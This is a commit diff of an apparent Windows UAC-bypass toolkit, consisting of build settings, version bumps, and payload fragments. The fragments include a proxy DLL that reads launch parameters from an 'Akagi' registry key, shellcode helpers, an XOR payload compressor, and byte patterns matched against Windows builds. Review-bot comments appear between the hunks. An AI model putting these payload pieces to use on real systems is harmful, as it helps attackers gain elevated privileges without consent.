<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
@ -148,6 +162,7 @@
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<EnablePREfast>true</EnablePREfast>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -160,6 +175,13 @@
<SetChecksum>true</SetChecksum>
<ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
</Link>
<PostBuildEvent>
<Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Hibiki32.dll</Command>
</PostBuildEvent>
<Manifest>
<AdditionalManifestFiles>
</AdditionalManifestFiles>
</Manifest>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
@ -175,6 +197,7 @@
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<EnablePREfast>true</EnablePREfast>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -187,6 +210,13 @@
<SetChecksum>true</SetChecksum>
<ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
</Link>
<PostBuildEvent>
<Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Hibiki64.dll</Command>
</PostBuildEvent>
<Manifest>
<AdditionalManifestFiles>
</AdditionalManifestFiles>
</Manifest>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\Shared\ultostr.c" />


@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2016
* (C) COPYRIGHT AUTHORS, 2014 - 2017
*
* TITLE: DLLMAIN.C
*
* VERSION: 2.10
* VERSION: 2.57
*
* DATE: 14 Apr 2016
* DATE: 07 Mar 2017
*
* AVrf entry point, Hibiki Kai Ni.
*
@ -30,8 +30,8 @@
#include <windows.h>
#include <ntstatus.h>
#include "..\shared\ntos.h"
#include "..\shared\minirtl.h"
#include "shared\ntos.h"
#include "shared\minirtl.h"
#if (_MSC_VER >= 1900)

Binary file not shown.


@ -75,6 +75,7 @@
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)32</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
@ -82,20 +83,23 @@
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)64</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)32</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)64</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
@ -109,6 +113,7 @@
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -130,6 +135,7 @@
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -154,6 +160,7 @@
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -165,6 +172,9 @@
<SetChecksum>true</SetChecksum>
<ModuleDefinitionFile>export.def</ModuleDefinitionFile>
</Link>
<PostBuildEvent>
<Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)32.dll</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
@ -181,6 +191,7 @@
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -192,6 +203,9 @@
<SetChecksum>true</SetChecksum>
<ModuleDefinitionFile>export.def</ModuleDefinitionFile>
</Link>
<PostBuildEvent>
<Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)64.dll</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\Shared\_filename.c" />


@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>


@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: DLLMAIN.C
*
* VERSION: 2.50
* VERSION: 2.57
*
* DATE: 07 July 2016
* DATE: 07 Mar 2017
*
* Proxy dll entry point, Ikazuchi.
*
@ -29,10 +29,10 @@
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#include <windows.h>
#include "..\Shared\ntos.h"
#include "shared\ntos.h"
#include <ntstatus.h>
#include "..\shared\minirtl.h"
#include "..\Shared\_filename.h"
#include "shared\minirtl.h"
#include "shared\_filename.h"
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
@ -43,7 +43,18 @@
#endif
#endif
#define T_SXS_DIRECTORY L"\\\\?\\globalroot\\systemroot\\winsxs\\"
#define SXS_DIRECTORY_LENGTH sizeof(T_SXS_DIRECTORY) - sizeof(WCHAR)
#define T_REGISTRY_USER L"\\REGISTRY\\USER\\"
#define REGISTRY_USER_LENGTH sizeof(T_REGISTRY_USER) - sizeof(WCHAR)
#define T_AKAGI_KEY L"Software\\Akagi"
#define AKAGI_KEY_LENGTH sizeof(T_AKAGI_KEY) - sizeof(WCHAR)
#define T_COMCTL32_SLASH L"\\comctl32.dll"
#define COMCTL32_SLASH_LENGTH sizeof(T_COMCTL32_SLASH) - sizeof(WCHAR)
#define T_AKAGI_PARAM L"LoveLetter"
#define COMCTL32_SXS L"microsoft.windows.common-controls"
#define COMCTL32_DLL L"comctl32.dll"
@ -52,7 +63,7 @@ typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entr
typedef struct _OBJSCANPARAM {
PWSTR Buffer;
ULONG BufferSize;
SIZE_T BufferSize;
} OBJSCANPARAM, *POBJSCANPARAM;
typedef struct _SXS_SEARCH_CONTEXT {
@ -179,6 +190,7 @@ NTSTATUS NTAPI supDetectObjectCallback(
_In_ PVOID CallbackParam
)
{
SIZE_T BufferSize;
POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam;
if (Entry == NULL) {
@ -189,17 +201,18 @@ NTSTATUS NTAPI supDetectObjectCallback(
return STATUS_INVALID_PARAMETER_2;
}
if (Param->Buffer == NULL || Param->BufferSize == 0) {
return STATUS_MEMORY_NOT_ALLOCATED;
}
if (Entry->Name.Buffer) {
BufferSize = Entry->Name.Length + sizeof(UNICODE_NULL);
Param->Buffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, BufferSize);
if (Param->Buffer) {
Param->BufferSize = BufferSize;
_strncpy(
Param->Buffer, Param->BufferSize / sizeof(WCHAR),
Entry->Name.Buffer, Param->BufferSize / sizeof(WCHAR)
Entry->Name.Buffer, Entry->Name.Length / sizeof(WCHAR)
);
return STATUS_SUCCESS;
}
}
return STATUS_UNSUCCESSFUL;
}
@ -327,15 +340,18 @@ HRESULT WINAPI TaskDialogIndirectForward(
if (lpszDirectoryName == NULL)
break;
sz = 0x1000 + (_strlen(lpszDirectoryName) * sizeof(WCHAR));
sz = SXS_DIRECTORY_LENGTH + COMCTL32_SLASH_LENGTH + ((1 + _strlen(lpszDirectoryName)) * sizeof(WCHAR));
NtAllocateVirtualMemory(NtCurrentProcess(), &lpSxsPath, 0, &sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (lpSxsPath == NULL)
break;
_strcpy(lpSxsPath, L"\\\\?\\globalroot\\systemroot\\winsxs\\");
_strcpy(lpSxsPath, T_SXS_DIRECTORY);
_strcat(lpSxsPath, lpszDirectoryName);
_strcat(lpSxsPath, L"\\comctl32.dll");
_strcat(lpSxsPath, T_COMCTL32_SLASH);
DllName.Buffer = NULL;
DllName.Length = 0;
DllName.MaximumLength = 0;
RtlInitUnicodeString(&DllName, lpSxsPath);
if (NT_SUCCESS(LdrLoadDll(NULL, NULL, &DllName, &hLib))) {
if (hLib) {
@ -389,39 +405,34 @@ BOOL ucmQueryCustomParameter(
STARTUPINFOW startupInfo;
PROCESS_INFORMATION processInfo;
ULONG bytesIO = 0L;
WCHAR szBuffer[MAX_PATH * 2];
OBJSCANPARAM Param;
do {
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
Param.Buffer = szBuffer;
Param.BufferSize = sizeof(szBuffer);
Param.Buffer = NULL;
Param.BufferSize = 0;
status = supEnumSystemObjects(L"\\Rpc Control\\Akagi", NULL,
supDetectObjectCallback, &Param);
if (!NT_SUCCESS(status))
break;
RtlSecureZeroMemory(&usKey, sizeof(usKey));
RtlInitUnicodeString(&usKey, szBuffer);
memIO = 0x1000 + (_strlen(szBuffer) * sizeof(WCHAR));
if ((Param.Buffer == NULL) || (Param.BufferSize == 0))
break;
memIO = MAX_PATH + Param.BufferSize + REGISTRY_USER_LENGTH + AKAGI_KEY_LENGTH;
lpszParamKey = RtlAllocateHeap(ProcessHeap, HEAP_ZERO_MEMORY, memIO);
if (lpszParamKey == NULL)
break;
_strcpy_w(lpszParamKey, L"\\REGISTRY\\USER\\");
_strcat_w(lpszParamKey, usKey.Buffer);
_strcpy_w(lpszParamKey, T_REGISTRY_USER);
_strcat_w(lpszParamKey, Param.Buffer);
_strcat_w(lpszParamKey, L"\\");
_strcat_w(lpszParamKey, T_AKAGI_KEY);
RtlSecureZeroMemory(&usKey, sizeof(usKey));
RtlInitUnicodeString(&usKey, lpszParamKey);
InitializeObjectAttributes(&obja, &usKey, OBJ_CASE_INSENSITIVE, NULL, NULL);
status = NtOpenKey(&hKey, KEY_ALL_ACCESS, &obja);
if (!NT_SUCCESS(status)) {
break;
@ -473,6 +484,9 @@ BOOL ucmQueryCustomParameter(
NtDeleteKey(hKey);
NtClose(hKey);
}
if (Param.Buffer != NULL) {
RtlFreeHeap(ProcessHeap, 0, Param.Buffer);
}
if (lpszParamKey != NULL) {
RtlFreeHeap(ProcessHeap, 0, lpszParamKey);
}

Binary file not shown.


@ -46,6 +46,7 @@
<TargetName>$(ProjectName)32</TargetName>
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
@ -53,18 +54,20 @@
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)32</TargetName>
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<WarningLevel>Level4</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>
</SDLCheck>
<BufferSecurityCheck>false</BufferSecurityCheck>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -74,7 +77,7 @@
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
@ -85,6 +88,7 @@
</SDLCheck>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
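Review bot: The rule set now differs by configuration: the Debug|Win32 property group still names `SecurityRules.ruleset` while Release|Win32 moves to `AllRules.ruleset`, so the two builds report different analysis findings. Setting `<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>` in the Debug group as well would keep them aligned. Both compile groups also keep `<BufferSecurityCheck>false</BufferSecurityCheck>` with an empty `<SDLCheck>`; a short XML comment saying why the stack-cookie check is off in this project would stop the next reader from treating it as an oversight.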


@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015
* (C) COPYRIGHT AUTHORS, 2015 - 2017
*
* TITLE: MAIN.C
*
* VERSION: 1.90
* VERSION: 2.57
*
* DATE: 16 Sept 2015
* DATE: 06 Mar 2017
*
* ShellCode.
*
@ -21,7 +21,7 @@
#pragma warning(disable: 4005) // macro redefinition
#include <Windows.h>
#include "..\Shared\ntos.h"
#include "shared\ntos.h"
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
@ -35,6 +35,14 @@
typedef HMODULE(WINAPI *pfnLoadLibraryA)(LPCSTR lpLibFileName);
typedef DWORD(WINAPI *pfnExpandEnvironmentStringsA)(LPCSTR lpSrc, LPSTR lpDst, DWORD nSize);
/*
* gethash
*
* Purpose:
*
* Used in shellcode, calculates specific hash for string.
*
*/
DWORD gethash(char *s)
{
DWORD h = 0;
@ -48,6 +56,14 @@ DWORD gethash(char *s)
return h;
}
/*
* rawGetProcAddress
*
* Purpose:
*
* GetProcAddress small implementation for shellcode.
*
*/
PVOID rawGetProcAddress(PVOID Module, DWORD hash)
{
PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Module;
@ -69,6 +85,14 @@ PVOID rawGetProcAddress(PVOID Module, DWORD hash)
return NULL;
}
/*
* main
*
* Purpose:
*
* Shellcode entry point.
*
*/
void main()
{
PTEB teb = (PTEB)__readfsdword(0x18);
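Review bot: The three added header comments give a purpose line but no contract. For `rawGetProcAddress` the comment should state that the function returns NULL on its fall-through path (the `return NULL;` at the end of its body is visible in the hunk), because a caller has to test the result before calling through it. For `gethash` it would help to say that `s` must be a NUL-terminated string; this is inferred, since the loop body lies outside the hunk. All three function bodies start or end outside the hunks shown.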


@ -88,14 +88,14 @@
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)32</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)64</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
@ -105,6 +105,7 @@
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -120,6 +121,7 @@
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -138,6 +140,7 @@
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -147,6 +150,9 @@
<SetChecksum>true</SetChecksum>
<EntryPointSymbol>main</EntryPointSymbol>
</Link>
<PostBuildEvent>
<Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)32.exe</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
@ -159,6 +165,7 @@
<PreprocessorDefinitions>NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -168,6 +175,9 @@
<SetChecksum>true</SetChecksum>
<EntryPointSymbol>main</EntryPointSymbol>
</Link>
<PostBuildEvent>
<Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)64.exe</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\Shared\strtoul.c" />
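Review bot: The new `<PostBuildEvent>` in both Release groups runs `\Utils\StripDebug.exe` through a root-relative path, so the build executes whatever binary sits at `\Utils\` on the current drive rather than one pinned inside the checkout. Anchoring and quoting the path, for example `"$(SolutionDir)Utils\StripDebug.exe" "$(TargetPath)"`, ties the tool to the source tree; the location under the solution directory is an assumption, so adjust it to wherever the tool is actually kept. The tool does not appear among the files visible in this part of the commit, so its origin and checksum should be recorded alongside the other entries in the hash list.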


@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: MAIN.C
*
* VERSION: 2.51
* VERSION: 2.57
*
* DATE: 10 July 2016
* DATE: 07 Mar 2017
*
* Naka, support payload compressor.
*
@ -41,10 +41,10 @@
#include <Windows.h>
#include <ntstatus.h>
#include "..\shared\ntos.h"
#include "..\shared\minirtl.h"
#include "..\Shared\cmdline.h"
#include "..\Shared\_filename.h"
#include "shared\ntos.h"
#include "shared\minirtl.h"
#include "shared\cmdline.h"
#include "shared\_filename.h"
ULONG g_XorKey = 'naka';
@ -189,6 +189,7 @@ PUCHAR CompressBufferLZNT1(
if (status != STATUS_SUCCESS) {
VirtualFree(CompBuffer, 0, MEM_RELEASE);
CompBuffer = NULL;
break;
}


@ -4,9 +4,9 @@
*
* TITLE: NTOS.H
*
* VERSION: 1.59
* VERSION: 1.60
*
* DATE: 28 Feb 2017
* DATE: 02 Mar 2017
*
* Common header file for the ntos API functions and definitions.
*
@ -5202,6 +5202,89 @@ NTSTATUS NTAPI RtlQueryElevationFlags(
** UAC Elevation END
*/
/*
* Memory parition START
*/
typedef enum _MEMORY_PARTITION_INFORMATION_CLASS {
SystemMemoryPartitionInformation = 0,
SystemMemoryPartitionMoveMemory = 1,
SystemMemoryPartitionAddPagefile = 2,
SystemMemoryPartitionCombineMemory = 3,
SystemMemoryPartitionInitialAddMemory = 4
} MEMORY_PARTITION_INFORMATION_CLASS;
typedef struct _MEMORY_PARTITION_PAGE_RANGE {
ULONG_PTR StartPage;
ULONG_PTR NumberOfPages;
} MEMORY_PARTITION_PAGE_RANGE, *PMEMORY_PARTITION_PAGE_RANGE;
typedef struct _MEMORY_PARTITION_INITIAL_ADD_INFORMATION {
ULONG Flags;
ULONG NumberOfRanges;
ULONG_PTR NumberOfPagesAdded;
MEMORY_PARTITION_PAGE_RANGE PartitionRanges[1];
} MEMORY_PARTITION_INITIAL_ADD_INFORMATION, *PMEMORY_PARTITION_INITIAL_ADD_INFORMATION;
typedef struct _MEMORY_PARTITION_PAGE_COMBINE_INFORMATION {
PVOID StopHandle;
ULONG Flags;
ULONG_PTR TotalNumberOfPages;
} MEMORY_PARTITION_PAGE_COMBINE_INFORMATION, *PMEMORY_PARTITION_PAGE_COMBINE_INFORMATION;
typedef struct _MEMORY_PARTITION_PAGEFILE_INFORMATION {
UNICODE_STRING PageFileName;
LARGE_INTEGER MinimumSize;
LARGE_INTEGER MaximumSize;
ULONG Flags;
} MEMORY_PARTITION_PAGEFILE_INFORMATION, *PMEMORY_PARTITION_PAGEFILE_INFORMATION;
typedef struct _MEMORY_PARTITION_TRANSFER_INFORMATION {
ULONG_PTR NumberOfPages;
ULONG NumaNode;
ULONG Flags;
} MEMORY_PARTITION_TRANSFER_INFORMATION, *PMEMORY_PARTITION_TRANSFER_INFORMATION;
typedef struct _MEMORY_PARTITION_CONFIGURATION_INFORMATION {
ULONG Flags;
ULONG NumaNode;
ULONG Channel;
ULONG NumberOfNumaNodes;
ULONG_PTR ResidentAvailablePages;
ULONG_PTR CommittedPages;
ULONG_PTR CommitLimit;
ULONG_PTR PeakCommitment;
ULONG_PTR TotalNumberOfPages;
ULONG_PTR AvailablePages;
ULONG_PTR ZeroPages;
ULONG_PTR FreePages;
ULONG_PTR StandbyPages;
} MEMORY_PARTITION_CONFIGURATION_INFORMATION, *PMEMORY_PARTITION_CONFIGURATION_INFORMATION;
NTSTATUS NTAPI NtOpenPartition(
_Out_ PHANDLE PartitionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes
);
NTSTATUS NTAPI NtManagePartition(
_In_ MEMORY_PARTITION_INFORMATION_CLASS PartitionInformationClass,
_Inout_ PVOID PartitionInformation,
_In_ ULONG PartitionInformationLength
);
NTSTATUS NTAPI NtCreatePartition(
_Out_ PHANDLE PartitionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ ULONG PreferredNode
);
/*
* Memory partition END
*/
/*
** Native API START
*/
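Review bot: `NtManagePartition` is declared without any handle parameter, although `NtOpenPartition` and `NtCreatePartition` in the same block each return a `PartitionHandle`; as written nothing consumes that handle, which suggests the prototype is incomplete. For an undocumented NTAPI routine a wrong parameter count unbalances the stack on x86, so the signature should be checked against the target build before any caller is added. The opening comment also has a typo: `Memory parition START` should read `Memory partition START`. `PartitionRanges[1]` is presumably a variable-length trailing array sized by `NumberOfRanges`, and a one-line comment saying so would help.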

Binary file not shown.


@ -64,6 +64,7 @@
<PreprocessorDefinitions>_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>$(ProjectDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
@ -86,6 +87,7 @@
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<ControlFlowGuard>Guard</ControlFlowGuard>
<MultiProcessorCompilation>true</MultiProcessorCompilation>
<AdditionalIncludeDirectories>$(ProjectDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>


@ -4,9 +4,9 @@
*
* TITLE: APPINFO.C
*
* VERSION: 1.10
* VERSION: 1.21
*
* DATE: 19 Feb 2017
* DATE: 04 Mar 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -30,18 +30,14 @@ pfnSymUnloadModule64 pSymUnloadModule64 = NULL;
pfnSymFromAddrW pSymFromAddrW = NULL;
pfnSymCleanup pSymCleanup = NULL;
//
// Should be = supported Windows builds
//
#define SUPPORTED_PATTERNS_COUNT 6
UAC_PATTERN g_MmcPatterns[SUPPORTED_PATTERNS_COUNT] = {
{ ptMmcBlock_7600, sizeof(ptMmcBlock_7600), 7600, 7600 },
{ ptMmcBlock_7601, sizeof(ptMmcBlock_7601), 7601, 7601 },
{ ptMmcBlock_9200, sizeof(ptMmcBlock_9200), 9200, 9200 },
{ ptMmcBlock_9600, sizeof(ptMmcBlock_9600), 9600, 9600 },
{ ptMmcBlock_10240, sizeof(ptMmcBlock_10240), 10240, 10240 },
{ ptMmcBlock_10586_15046, sizeof(ptMmcBlock_10586_15046), 10586, 15046 }
{ ptMmcBlock_10586_15048, sizeof(ptMmcBlock_10586_15048), 10586, 15048 }
};
#define TestChar(x) ((x >= L'A') && (x <= L'z'))


@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
* VERSION: 1.20
* VERSION: 1.21
*
* DATE: 01 Mar 2017
* DATE: 02 Mar 2017
*
* Global consts definition file.
*
@ -33,7 +33,7 @@
#define T_FLAG_INSTALLERDETECT_ENABLED TEXT("InstallerDetectEnabled")
#define T_PROGRAM_NAME TEXT("Yuubari")
#define T_PROGRAM_TITLE TEXT("[UacView] UAC information gathering tool, v1.2.0 (01/03/2017)\n")
#define T_PROGRAM_TITLE TEXT("[UacView] UAC information gathering tool, v1.2.1 (02/03/2017)\n")
#define T_HELP TEXT("Optional parameters to execute: \n\n\r\
YUUBARI [/v] \n\n\r\


@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
* VERSION: 1.20
* VERSION: 1.21
*
* DATE: 01 Mar 2017
* DATE: 07 Mar 2017
*
* Program entry point.
*


@ -4,15 +4,15 @@
*
* TITLE: PATTERNS.H
*
* VERSION: 1.20
* VERSION: 1.21
*
* DATE: 01 Mar 2017
* DATE: 04 Mar 2017
*
* Patterns for supported AppInfo versions.
*
* Minimum client: 7600
*
* Maximum client: 15046
* Maximum client: 15048
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -41,7 +41,7 @@ unsigned char ptMmcBlock_9600[] = {
unsigned char ptMmcBlock_10240[] = {
0x49, 0x8B, 0x14, 0x24, 0x49, 0x8B, 0xCE, 0xFF, 0x15
};
unsigned char ptMmcBlock_10586_15046[] = {
unsigned char ptMmcBlock_10586_15048[] = {
0x49, 0x8B, 0x16, 0x49, 0x8B, 0xCD, 0xFF, 0x15
};


@ -4,9 +4,9 @@
*
* TITLE: TEST_FUSION.C
*
* VERSION: 1.10
* VERSION: 1.21
*
* DATE: 20 Feb 2017
* DATE: 03 Mar 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -14,8 +14,8 @@
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "..\global.h"
#include "..\fusion.h"
#include "global.h"
#include "fusion.h"
BYTE TestArray[1024 * 32] = { 0 };


@ -22,6 +22,7 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "shared", "shared", "{49552A
Shared\cmdline.c = Shared\cmdline.c
shared\minirtl.h = shared\minirtl.h
shared\ntos.h = shared\ntos.h
Shared\ntsxs.h = Shared\ntsxs.h
shared\rtltypes.h = shared\rtltypes.h
Shared\strtoul.c = Shared\strtoul.c
EndProjectSection


@ -1,8 +1,8 @@
2b2fcde2f1ae5876945bd2ec066016d18d9461a99eca70b5a1c597a95575ccd7 *Compiled\Akagi32.exe
